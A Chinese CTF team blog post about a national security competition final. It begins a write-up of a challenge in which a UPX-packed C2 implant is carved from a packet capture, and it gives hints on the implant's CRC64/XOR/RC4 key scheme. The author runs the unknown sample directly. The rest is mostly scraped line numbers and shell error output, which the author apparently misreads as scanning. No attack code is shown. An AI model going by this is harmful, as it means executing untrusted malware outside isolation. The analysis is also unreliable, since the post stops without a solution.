我们 CTF 玩家就是拿着台电脑过去一开坐一天就结束了 —— Ron#1337

没错,在 5.17-5.18,我们 Volcania 参加了第十八届软件系统安全赛攻防赛全国总决赛

这次说是总决赛,但其实队我们队伍来说应该是公费旅游环节,我们在这场总决赛中确确实实爆零了(┬_┬)

比赛

不是哥们?湖南大学还能停电的啊???开赛前半个小时停电了,连电灯都没了,大概率是过载了……

后来给了我们附件压缩包,说密码一起给,结果到电恢复了都没给 =-=

本次比赛总共有十道题目,并且出现了很明显的领域交叉情况(就是说 re 带 misc 之类的这种情况),而且涉及到的知识点也非常地广

Seijaku

seijaku提示:1、/openapi.json

Seijaku提示:2、大概就是用给定的固定密钥 + 当前 Unix 秒级时间戳进行 CRC64,把这个值发送给 C2 服务器,然后和固定密钥进行循环异或作为本次 RC4 加密密钥。

Seijaku提示:3、user:user

最开始拿到附件,给了一个流量包,从流量包可以提取到一个附件,并且通过链接可以得到以下信息

  • 此文件是一个二进制文件(/binary
  • 此文件的反向连接地址为 seijaku.local
  • 此文件经过 upx 压缩

拿下来以后第一件事情是 UPX 解压

题目里面还提供了一个 project.tar.gz,解压一下发现是一个 python 的 venv 环境,可以激活一下

1
$ source .venv/bin/activate

接着尝试运行一次二进制文件

1
2
$ chmod +x bin
$ ./bin > output.log 2>&1

运行时之后会执行类似扫描的操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
1111
1112
1113
1114
1115
1116
1117
1118
1119
1120
1121
1122
1123
1124
1125
1126
1127
1128
1129
1130
1131
1132
1133
1134
1135
1136
1137
1138
1139
1140
1141
1142
1143
1144
1145
1146
1147
1148
1149
1150
1151
1152
1153
1154
1155
1156
1157
1158
1159
1160
1161
1162
1163
1164
1165
1166
1167
1168
1169
1170
1171
1172
1173
1174
1175
1176
1177
1178
1179
1180
1181
1182
1183
1184
1185
1186
1187
1188
1189
1190
1191
1192
1193
1194
1195
1196
1197
1198
1199
1200
1201
1202
1203
1204
1205
1206
1207
1208
1209
1210
1211
1212
1213
1214
1215
1216
1217
1218
1219
1220
1221
1222
1223
1224
1225
1226
1227
1228
1229
1230
1231
1232
1233
1234
1235
1236
1237
1238
1239
1240
1241
1242
1243
1244
1245
1246
1247
1248
1249
1250
1251
1252
1253
1254
1255
1256
1257
1258
1259
1260
1261
1262
1263
1264
1265
1266
1267
1268
1269
1270
1271
1272
1273
1274
1275
1276
1277
1278
1279
1280
1281
1282
1283
1284
1285
1286
1287
1288
1289
1290
1291
1292
1293
1294
1295
1296
1297
1298
1299
1300
1301
1302
1303
1304
1305
1306
1307
1308
1309
1310
1311
1312
1313
1314
1315
1316
1317
1318
1319
1320
1321
1322
1323
1324
1325
1326
1327
1328
1329
1330
1331
1332
1333
1334
1335
1336
1337
1338
1339
1340
1341
1342
1343
1344
1345
1346
1347
1348
1349
1350
1351
1352
1353
1354
1355
1356
1357
1358
1359
1360
1361
1362
1363
1364
1365
1366
1367
1368
1369
1370
1371
1372
1373
1374
1375
1376
1377
1378
1379
1380
1381
1382
1383
1384
1385
1386
1387
1388
1389
1390
1391
1392
1393
1394
1395
1396
1397
1398
1399
1400
1401
1402
1403
1404
1405
1406
1407
1408
1409
1410
1411
1412
1413
1414
1415
1416
1417
1418
1419
1420
1421
1422
1423
1424
1425
1426
1427
1428
1429
1430
1431
1432
1433
1434
1435
1436
1437
1438
1439
1440
1441
1442
1443
1444
1445
1446
1447
1448
1449
1450
1451
1452
1453
1454
1455
1456
1457
1458
1459
1460
1461
1462
1463
1464
1465
1466
1467
1468
1469
1470
1471
1472
1473
1474
1475
1476
1477
1478
1479
1480
1481
1482
1483
1484
1485
1486
1487
1488
1489
1490
1491
1492
1493
1494
1495
1496
1497
1498
1499
1500
1501
1502
1503
1504
1505
1506
1507
1508
1509
1510
1511
1512
1513
1514
1515
1516
1517
1518
1519
1520
1521
1522
1523
1524
1525
1526
1527
1528
1529
1530
1531
1532
1533
1534
1535
1536
1537
1538
1539
1540
1541
1542
1543
1544
1545
1546
1547
1548
1549
1550
1551
1552
1553
1554
1555
1556
1557
1558
1559
1560
1561
1562
1563
1564
1565
1566
1567
1568
1569
1570
1571
1572
1573
1574
1575
1576
1577
1578
1579
1580
1581
1582
1583
1584
1585
1586
1587
1588
1589
1590
1591
1592
1593
1594
1595
1596
1597
1598
1599
1600
1601
1602
1603
1604
1605
1606
1607
1608
1609
1610
1611
1612
1613
1614
1615
1616
1617
1618
1619
1620
1621
1622
1623
1624
1625
1626
1627
1628
1629
1630
1631
1632
1633
1634
1635
1636
1637
1638
1639
1640
1641
1642
1643
1644
1645
1646
1647
1648
1649
1650
1651
1652
1653
1654
1655
1656
1657
1658
1659
1660
1661
1662
1663
1664
1665
1666
1667
1668
1669
1670
1671
1672
1673
1674
1675
1676
1677
1678
1679
1680
1681
1682
1683
1684
1685
1686
1687
1688
1689
1690
1691
1692
1693
1694
1695
1696
1697
1698
1699
1700
1701
1702
1703
1704
1705
1706
1707
1708
1709
1710
1711
1712
1713
1714
1715
1716
1717
1718
1719
1720
1721
1722
1723
1724
1725
1726
1727
1728
1729
1730
1731
1732
1733
1734
1735
1736
1737
1738
1739
1740
1741
1742
1743
1744
1745
1746
1747
1748
1749
1750
1751
1752
1753
1754
1755
1756
1757
1758
1759
1760
1761
1762
1763
1764
1765
1766
1767
1768
1769
1770
1771
1772
1773
1774
1775
1776
1777
1778
1779
1780
1781
1782
1783
1784
1785
1786
1787
1788
1789
1790
1791
1792
1793
1794
1795
1796
1797
1798
1799
1800
1801
1802
1803
1804
1805
1806
1807
1808
1809
1810
1811
1812
1813
1814
1815
1816
1817
1818
1819
1820
1821
1822
1823
1824
1825
1826
1827
1828
1829
1830
1831
1832
1833
1834
1835
1836
1837
1838
1839
1840
1841
1842
1843
1844
1845
1846
1847
1848
1849
1850
1851
1852
1853
1854
1855
1856
1857
1858
1859
1860
1861
1862
1863
1864
1865
1866
1867
1868
1869
1870
1871
1872
1873
1874
1875
1876
1877
1878
1879
1880
1881
1882
1883
1884
1885
1886
1887
1888
1889
1890
1891
1892
1893
1894
1895
1896
1897
1898
1899
1900
1901
1902
1903
1904
1905
1906
1907
1908
1909
1910
1911
1912
1913
1914
1915
1916
1917
1918
1919
1920
1921
1922
1923
1924
1925
1926
1927
1928
1929
1930
1931
1932
1933
1934
1935
1936
1937
1938
1939
1940
1941
1942
1943
1944
1945
1946
1947
1948
1949
1950
1951
1952
1953
1954
1955
1956
1957
1958
1959
1960
1961
1962
1963
1964
1965
1966
1967
1968
1969
1970
1971
1972
1973
1974
1975
1976
1977
1978
1979
1980
1981
1982
1983
1984
1985
1986
1987
1988
1989
1990
1991
1992
1993
1994
1995
1996
1997
1998
1999
2000
2001
2002
2003
2004
2005
2006
2007
2008
2009
2010
2011
2012
2013
2014
2015
2016
2017
2018
2019
2020
2021
2022
2023
2024
2025
2026
2027
2028
2029
2030
2031
2032
2033
2034
2035
2036
2037
2038
2039
2040
2041
2042
2043
2044
2045
2046
2047
2048
2049
2050
2051
2052
2053
2054
2055
2056
2057
2058
2059
2060
2061
2062
2063
2064
2065
2066
2067
2068
2069
2070
2071
2072
2073
2074
2075
2076
2077
2078
2079
2080
2081
2082
2083
2084
2085
2086
2087
2088
2089
2090
2091
2092
2093
2094
2095
2096
2097
2098
2099
2100
2101
2102
2103
2104
2105
2106
2107
2108
2109
2110
2111
2112
2113
2114
2115
2116
2117
2118
2119
2120
2121
2122
2123
2124
2125
2126
2127
2128
2129
2130
2131
2132
2133
2134
2135
2136
2137
2138
2139
2140
2141
2142
2143
2144
2145
2146
2147
2148
2149
2150
2151
2152
2153
2154
2155
2156
2157
2158
2159
2160
2161
2162
2163
2164
2165
2166
2167
2168
2169
2170
2171
2172
2173
2174
2175
2176
2177
2178
2179
2180
2181
2182
2183
2184
2185
2186
2187
2188
2189
2190
2191
2192
2193
2194
2195
2196
2197
2198
2199
2200
2201
2202
2203
2204
2205
2206
2207
2208
2209
2210
2211
2212
2213
2214
2215
2216
2217
2218
2219
2220
2221
2222
2223
2224
2225
2226
2227
2228
2229
2230
2231
2232
2233
2234
2235
2236
2237
2238
2239
2240
2241
2242
2243
2244
2245
2246
2247
2248
2249
2250
2251
2252
2253
2254
2255
2256
2257
2258
2259
2260
2261
2262
2263
2264
2265
2266
2267
2268
2269
2270
2271
2272
2273
2274
2275
2276
2277
2278
2279
2280
2281
2282
2283
2284
2285
2286
2287
2288
2289
2290
2291
2292
2293
2294
2295
2296
2297
2298
2299
2300
2301
2302
2303
2304
2305
2306
2307
2308
2309
2310
2311
2312
2313
2314
2315
2316
2317
2318
2319
2320
2321
2322
2323
2324
2325
2326
2327
2328
2329
2330
2331
2332
2333
2334
2335
2336
2337
2338
2339
2340
2341
2342
2343
2344
2345
2346
2347
2348
2349
2350
2351
2352
2353
2354
2355
2356
2357
2358
2359
2360
2361
2362
2363
2364
2365
2366
2367
2368
2369
2370
2371
2372
2373
2374
2375
2376
2377
2378
2379
2380
2381
2382
2383
2384
2385
2386
2387
2388
2389
2390
2391
2392
2393
2394
2395
2396
2397
2398
2399
2400
2401
2402
2403
2404
2405
2406
2407
2408
2409
2410
2411
2412
2413
2414
2415
2416
2417
2418
2419
2420
2421
2422
2423
2424
2425
2426
2427
2428
2429
2430
2431
2432
2433
2434
2435
2436
2437
2438
2439
2440
2441
2442
2443
2444
2445
2446
2447
2448
2449
2450
2451
2452
2453
2454
2455
2456
2457
2458
2459
2460
2461
2462
2463
2464
2465
2466
2467
2468
2469
2470
2471
2472
2473
2474
2475
2476
2477
2478
2479
2480
2481
2482
2483
2484
2485
2486
2487
2488
2489
2490
2491
2492
2493
2494
2495
2496
2497
2498
2499
2500
2501
2502
2503
2504
2505
2506
2507
2508
2509
2510
2511
2512
2513
2514
2515
2516
2517
2518
2519
2520
2521
2522
2523
2524
2525
2526
2527
2528
2529
2530
2531
2532
2533
2534
2535
2536
2537
2538
2539
2540
2541
2542
2543
2544
2545
2546
2547
2548
2549
2550
2551
./bin: 1: 0000: not found
./bin: 2: 0010: not found
./bin: 3: 0020: not found
./bin: 4: 0030: not found
./bin: 5: 0040: not found
./bin: 6: 0050: not found
./bin: 7: 0060: not found
./bin: 8: 0070: not found
./bin: 9: 0080: not found
./bin: 10: 0090: not found
./bin: 11: 00a0: not found
./bin: 12: 00b0: not found
./bin: 13: 00c0: not found
./bin: 14: 00d0: not found
./bin: 15: 00e0: not found
./bin: 16: 00f0: not found
./bin: 17: 0100: not found
./bin: 18: 0110: not found
./bin: 19: 0120: not found
./bin: 20: 0130: not found
./bin: 21: 0140: not found
./bin: 22: 0150: not found
./bin: 23: 0160: not found
./bin: 24: 0170: not found
./bin: 25: 0180: not found
./bin: 26: 0190: not found
./bin: 27: 01a0: not found
./bin: 28: 01b0: not found
./bin: 29: 01c0: not found
./bin: 30: 01d0: not found
./bin: 31: 01e0: not found
./bin: 32: 01f0: not found
./bin: 33: 0200: not found
./bin: 34: 0210: not found
./bin: 35: 0220: not found
./bin: 36: 0230: not found
./bin: 37: 0240: not found
./bin: 38: 0250: not found
./bin: 39: 0260: not found
./bin: 40: 0270: not found
./bin: 41: 0280: not found
./bin: 42: 0290: not found
./bin: 43: 02a0: not found
./bin: 44: 02b0: not found
./bin: 45: 02c0: not found
./bin: 46: 02d0: not found
./bin: 47: 02e0: not found
./bin: 48: 02f0: not found
./bin: 49: 0300: not found
./bin: 50: 0310: not found
./bin: 51: 0320: not found
./bin: 52: 0330: not found
./bin: 53: 0340: not found
./bin: 54: 0350: not found
./bin: 55: 0360: not found
./bin: 56: 0370: not found
./bin: 57: 0380: not found
./bin: 58: 0390: not found
./bin: 59: 03a0: not found
./bin: 60: 03b0: not found
./bin: 61: 03c0: not found
./bin: 62: 03d0: not found
./bin: 63: 03e0: not found
./bin: 64: 03f0: not found
./bin: 65: 0400: not found
./bin: 66: 0410: not found
./bin: 67: 0420: not found
./bin: 68: 0430: not found
./bin: 69: 0440: not found
./bin: 70: 0450: not found
./bin: 71: 0460: not found
./bin: 72: 0470: not found
./bin: 73: 0480: not found
./bin: 74: 0490: not found
./bin: 75: 04a0: not found
./bin: 76: 04b0: not found
./bin: 77: 04c0: not found
./bin: 78: 04d0: not found
./bin: 79: 04e0: not found
./bin: 80: 04f0: not found
./bin: 81: 0500: not found
./bin: 82: 0510: not found
./bin: 83: 0520: not found
./bin: 84: 0530: not found
./bin: 85: 0540: not found
./bin: 86: 0550: not found
./bin: 87: 0560: not found
./bin: 88: 0570: not found
./bin: 89: 0580: not found
./bin: 90: 0590: not found
./bin: 91: 05a0: not found
./bin: 92: 05b0: not found
./bin: 93: 05c0: not found
./bin: 94: 05d0: not found
./bin: 95: 05e0: not found
./bin: 96: 05f0: not found
./bin: 97: 0600: not found
./bin: 98: 0610: not found
./bin: 99: 0620: not found
./bin: 100: 0630: not found
./bin: 101: 0640: not found
./bin: 102: 0650: not found
./bin: 103: 0660: not found
./bin: 104: 0670: not found
./bin: 105: 0680: not found
./bin: 106: 0690: not found
./bin: 107: 06a0: not found
./bin: 108: 06b0: not found
./bin: 109: 06c0: not found
./bin: 110: 06d0: not found
./bin: 111: 06e0: not found
./bin: 112: 06f0: not found
./bin: 113: 0700: not found
./bin: 114: 0710: not found
./bin: 115: 0720: not found
./bin: 116: 0730: not found
./bin: 117: 0740: not found
./bin: 118: 0750: not found
./bin: 119: 0760: not found
./bin: 120: 0770: not found
./bin: 121: 0780: not found
./bin: 122: 0790: not found
./bin: 123: 07a0: not found
./bin: 124: 07b0: not found
./bin: 125: 07c0: not found
./bin: 126: 07d0: not found
./bin: 127: 07e0: not found
./bin: 128: 07f0: not found
./bin: 129: 0800: not found
./bin: 130: 0810: not found
./bin: 131: 0820: not found
./bin: 132: 0830: not found
./bin: 133: 0840: not found
./bin: 134: 0850: not found
./bin: 135: 0860: not found
./bin: 136: 0870: not found
./bin: 137: 0880: not found
./bin: 138: 0890: not found
./bin: 139: 08a0: not found
./bin: 140: 08b0: not found
./bin: 141: 08c0: not found
./bin: 142: 08d0: not found
./bin: 143: 08e0: not found
./bin: 144: 08f0: not found
./bin: 145: 0900: not found
./bin: 146: 0910: not found
./bin: 147: 0920: not found
./bin: 148: 0930: not found
./bin: 149: 0940: not found
./bin: 150: 0950: not found
./bin: 151: 0960: not found
./bin: 152: 0970: not found
./bin: 153: 0980: not found
./bin: 154: 0990: not found
./bin: 155: 09a0: not found
./bin: 156: 09b0: not found
./bin: 157: 09c0: not found
./bin: 158: 09d0: not found
./bin: 159: 09e0: not found
./bin: 160: 09f0: not found
./bin: 161: 0a00: not found
./bin: 162: 0a10: not found
./bin: 163: 0a20: not found
./bin: 164: 0a30: not found
./bin: 165: 0a40: not found
./bin: 166: 0a50: not found
./bin: 167: 0a60: not found
./bin: 168: 0a70: not found
./bin: 169: 0a80: not found
./bin: 170: 0a90: not found
./bin: 171: 0aa0: not found
./bin: 172: 0ab0: not found
./bin: 173: 0ac0: not found
./bin: 174: 0ad0: not found
./bin: 175: 0ae0: not found
./bin: 176: 0af0: not found
./bin: 177: 0b00: not found
./bin: 178: 0b10: not found
./bin: 179: 0b20: not found
./bin: 180: 0b30: not found
./bin: 181: 0b40: not found
./bin: 182: 0b50: not found
./bin: 183: 0b60: not found
./bin: 184: 0b70: not found
./bin: 185: 0b80: not found
./bin: 186: 0b90: not found
./bin: 187: 0ba0: not found
./bin: 188: 0bb0: not found
./bin: 189: 0bc0: not found
./bin: 190: 0bd0: not found
./bin: 191: 0be0: not found
./bin: 192: 0bf0: not found
./bin: 193: 0c00: not found
./bin: 194: 0c10: not found
./bin: 195: 0c20: not found
./bin: 196: 0c30: not found
./bin: 197: 0c40: not found
./bin: 198: 0c50: not found
./bin: 199: 0c60: not found
./bin: 200: 0c70: not found
./bin: 201: 0c80: not found
./bin: 202: 0c90: not found
./bin: 203: 0ca0: not found
./bin: 204: 0cb0: not found
./bin: 205: 0cc0: not found
./bin: 206: 0cd0: not found
./bin: 207: 0ce0: not found
./bin: 208: 0cf0: not found
./bin: 209: 0d00: not found
./bin: 210: 0d10: not found
./bin: 211: 0d20: not found
./bin: 212: 0d30: not found
./bin: 213: 0d40: not found
./bin: 214: 0d50: not found
./bin: 215: 0d60: not found
./bin: 216: 0d70: not found
./bin: 217: 0d80: not found
./bin: 218: 0d90: not found
./bin: 219: 0da0: not found
./bin: 220: 0db0: not found
./bin: 221: 0dc0: not found
./bin: 222: 0dd0: not found
./bin: 223: 0de0: not found
./bin: 224: 0df0: not found
./bin: 225: 0e00: not found
./bin: 226: 0e10: not found
./bin: 227: 0e20: not found
./bin: 228: 0e30: not found
./bin: 229: 0e40: not found
./bin: 230: 0e50: not found
./bin: 231: 0e60: not found
./bin: 232: 0e70: not found
./bin: 233: 0e80: not found
./bin: 234: 0e90: not found
./bin: 235: 0ea0: not found
./bin: 236: 0eb0: not found
./bin: 237: 0ec0: not found
./bin: 238: 0ed0: not found
./bin: 239: 0ee0: not found
./bin: 240: 0ef0: not found
./bin: 241: 0f00: not found
./bin: 242: 0f10: not found
./bin: 243: 0f20: not found
./bin: 244: 0f30: not found
./bin: 245: 0f40: not found
./bin: 246: 0f50: not found
./bin: 247: 0f60: not found
./bin: 248: 0f70: not found
./bin: 249: 0f80: not found
./bin: 250: 0f90: not found
./bin: 251: 0fa0: not found
./bin: 252: 0fb0: not found
./bin: 253: 0fc0: not found
./bin: 254: 0fd0: not found
./bin: 255: 0fe0: not found
./bin: 256: 0ff0: not found
./bin: 257: 1000: not found
./bin: 258: 1010: not found
./bin: 259: 1020: not found
./bin: 260: 1030: not found
./bin: 261: 1040: Permission denied
./bin: 262: 1050: not found
./bin: 263: 1060: not found
./bin: 264: 1070: not found
./bin: 265: 1080: not found
./bin: 266: 1090: not found
./bin: 267: 10a0: not found
./bin: 268: 10b0: not found
./bin: 269: 10c0: not found
./bin: 270: 10d0: not found
./bin: 271: 10e0: not found
./bin: 272: 10f0: not found
./bin: 273: 1100: not found
./bin: 274: 1110: not found
./bin: 275: 1120: not found
./bin: 276: 1130: not found
./bin: 277: 1140: not found
./bin: 278: 1150: not found
./bin: 279: 1160: not found
./bin: 280: 1170: not found
./bin: 281: 1180: not found
./bin: 282: 1190: not found
./bin: 283: 11a0: not found
./bin: 284: 11b0: not found
./bin: 285: 11c0: not found
./bin: 286: 11d0: not found
./bin: 287: 11e0: not found
./bin: 288: 11f0: not found
./bin: 289: 1200: not found
./bin: 290: 1210: not found
./bin: 291: 1220: not found
./bin: 292: 1230: not found
./bin: 293: 1240: not found
./bin: 294: 1250: not found
./bin: 295: 1260: not found
./bin: 296: 1270: not found
./bin: 297: 1280: not found
./bin: 298: 1290: not found
./bin: 299: 12a0: not found
./bin: 300: 12b0: not found
./bin: 301: 12c0: not found
./bin: 302: 12d0: not found
./bin: 303: 12e0: not found
./bin: 304: 12f0: not found
./bin: 305: 1300: not found
./bin: 306: 1310: not found
./bin: 307: 1320: not found
./bin: 308: 1330: not found
./bin: 309: 1340: not found
./bin: 310: 1350: not found
./bin: 311: 1360: not found
./bin: 312: 1370: not found
./bin: 313: 1380: not found
./bin: 314: 1390: not found
./bin: 315: 13a0: not found
./bin: 316: 13b0: not found
./bin: 317: 13c0: not found
./bin: 318: 13d0: not found
./bin: 319: 13e0: not found
./bin: 320: 13f0: not found
./bin: 321: 1400: not found
./bin: 322: 1410: not found
./bin: 323: 1420: not found
./bin: 324: 1430: not found
./bin: 325: 1440: not found
./bin: 326: 1450: not found
./bin: 327: 1460: not found
./bin: 328: 1470: not found
./bin: 329: 1480: not found
./bin: 330: 1490: not found
./bin: 331: 14a0: not found
./bin: 332: 14b0: not found
./bin: 333: 14c0: not found
./bin: 334: 14d0: not found
./bin: 335: 14e0: not found
./bin: 336: 14f0: not found
./bin: 337: 1500: not found
./bin: 338: 1510: not found
./bin: 339: 1520: not found
./bin: 340: 1530: not found
./bin: 341: 1540: not found
./bin: 342: 1550: not found
./bin: 343: 1560: not found
./bin: 344: 1570: not found
./bin: 345: 1580: not found
./bin: 346: 1590: not found
./bin: 347: 15a0: not found
./bin: 348: 15b0: not found
./bin: 349: 15c0: not found
./bin: 350: 15d0: not found
./bin: 351: 15e0: not found
./bin: 352: 15f0: not found
./bin: 353: 1600: not found
./bin: 354: 1610: not found
./bin: 355: 1620: not found
./bin: 356: 1630: not found
./bin: 357: 1640: not found
./bin: 358: 1650: not found
./bin: 359: 1660: not found
./bin: 360: 1670: not found
./bin: 361: 1680: not found
./bin: 362: 1690: not found
./bin: 363: 16a0: not found
./bin: 364: 16b0: not found
./bin: 365: 16c0: not found
./bin: 366: 16d0: not found
./bin: 367: 16e0: not found
./bin: 368: 16f0: not found
./bin: 369: 1700: not found
./bin: 370: 1710: not found
./bin: 371: 1720: not found
./bin: 372: 1730: not found
./bin: 373: 1740: not found
./bin: 374: 1750: not found
./bin: 375: 1760: not found
./bin: 376: 1770: not found
./bin: 377: 1780: not found
./bin: 378: 1790: not found
./bin: 379: 17a0: not found
./bin: 380: 17b0: not found
./bin: 381: 17c0: not found
./bin: 382: 17d0: not found
./bin: 383: 17e0: not found
./bin: 384: 17f0: not found
./bin: 385: 1800: not found
./bin: 386: 1810: not found
./bin: 387: 1820: not found
./bin: 388: 1830: not found
./bin: 389: 1840: not found
./bin: 390: 1850: not found
./bin: 391: 1860: not found
./bin: 392: 1870: not found
./bin: 393: 1880: not found
./bin: 394: 1890: not found
./bin: 395: 18a0: not found
./bin: 396: 18b0: not found
./bin: 397: 18c0: not found
./bin: 398: 18d0: not found
./bin: 399: 18e0: not found
./bin: 400: 18f0: not found
./bin: 401: 1900: not found
./bin: 402: 1910: not found
./bin: 403: 1920: not found
./bin: 404: 1930: not found
./bin: 405: 1940: not found
./bin: 406: 1950: not found
./bin: 407: 1960: not found
./bin: 408: 1970: not found
./bin: 409: 1980: not found
./bin: 410: 1990: not found
./bin: 411: 19a0: not found
./bin: 412: 19b0: not found
./bin: 413: 19c0: not found
./bin: 414: 19d0: not found
./bin: 415: 19e0: not found
./bin: 416: 19f0: not found
./bin: 417: 1a00: not found
./bin: 418: 1a10: not found
./bin: 419: 1a20: not found
./bin: 420: 1a30: not found
./bin: 421: 1a40: not found
./bin: 422: 1a50: not found
./bin: 423: 1a60: not found
./bin: 424: 1a70: not found
./bin: 425: 1a80: not found
./bin: 426: 1a90: not found
./bin: 427: 1aa0: not found
./bin: 428: 1ab0: not found
./bin: 429: 1ac0: not found
./bin: 430: 1ad0: not found
./bin: 431: 1ae0: not found
./bin: 432: 1af0: not found
./bin: 433: 1b00: not found
./bin: 434: 1b10: not found
./bin: 435: 1b20: not found
./bin: 436: 1b30: not found
./bin: 437: 1b40: not found
./bin: 438: 1b50: not found
./bin: 439: 1b60: not found
./bin: 440: 1b70: not found
./bin: 441: 1b80: not found
./bin: 442: 1b90: not found
./bin: 443: 1ba0: not found
./bin: 444: 1bb0: not found
./bin: 445: 1bc0: not found
./bin: 446: 1bd0: not found
./bin: 447: 1be0: not found
./bin: 448: 1bf0: not found
./bin: 449: 1c00: not found
./bin: 450: 1c10: not found
./bin: 451: 1c20: not found
./bin: 452: 1c30: not found
./bin: 453: 1c40: not found
./bin: 454: 1c50: not found
./bin: 455: 1c60: not found
./bin: 456: 1c70: not found
./bin: 457: 1c80: not found
./bin: 458: 1c90: not found
./bin: 459: 1ca0: not found
./bin: 460: 1cb0: not found
./bin: 461: 1cc0: not found
./bin: 462: 1cd0: not found
./bin: 463: 1ce0: not found
./bin: 464: 1cf0: not found
./bin: 465: 1d00: not found
./bin: 466: 1d10: not found
./bin: 467: 1d20: not found
./bin: 468: 1d30: not found
./bin: 469: 1d40: not found
./bin: 470: 1d50: not found
./bin: 471: 1d60: not found
./bin: 472: 1d70: not found
./bin: 473: 1d80: not found
./bin: 474: 1d90: not found
./bin: 475: 1da0: not found
./bin: 476: 1db0: not found
./bin: 477: 1dc0: not found
./bin: 478: 1dd0: not found
./bin: 479: 1de0: not found
./bin: 480: 1df0: not found
./bin: 481: 1e00: not found
./bin: 482: 1e10: not found
./bin: 483: 1e20: not found
./bin: 484: 1e30: not found
./bin: 485: 1e40: not found
./bin: 486: 1e50: not found
./bin: 487: 1e60: not found
./bin: 488: 1e70: not found
./bin: 489: 1e80: not found
./bin: 490: 1e90: not found
./bin: 491: 1ea0: not found
./bin: 492: 1eb0: not found
./bin: 493: 1ec0: not found
./bin: 494: 1ed0: not found
./bin: 495: 1ee0: not found
./bin: 496: 1ef0: not found
./bin: 497: 1f00: not found
./bin: 498: 1f10: not found
./bin: 499: 1f20: not found
./bin: 500: 1f30: not found
./bin: 501: 1f40: not found
./bin: 502: 1f50: not found
./bin: 503: 1f60: not found
./bin: 504: 1f70: not found
./bin: 505: 1f80: not found
./bin: 506: 1f90: not found
./bin: 507: 1fa0: not found
./bin: 508: 1fb0: not found
./bin: 509: 1fc0: not found
./bin: 510: 1fd0: not found
./bin: 511: 1fe0: not found
./bin: 512: 1ff0: not found
./bin: 513: 2000: not found
./bin: 514: 2010: not found
./bin: 515: 2020: not found
./bin: 516: 2030: not found
./bin: 517: 2040: not found
./bin: 518: 2050: not found
./bin: 519: 2060: not found
./bin: 520: 2070: not found
./bin: 521: 2080: not found
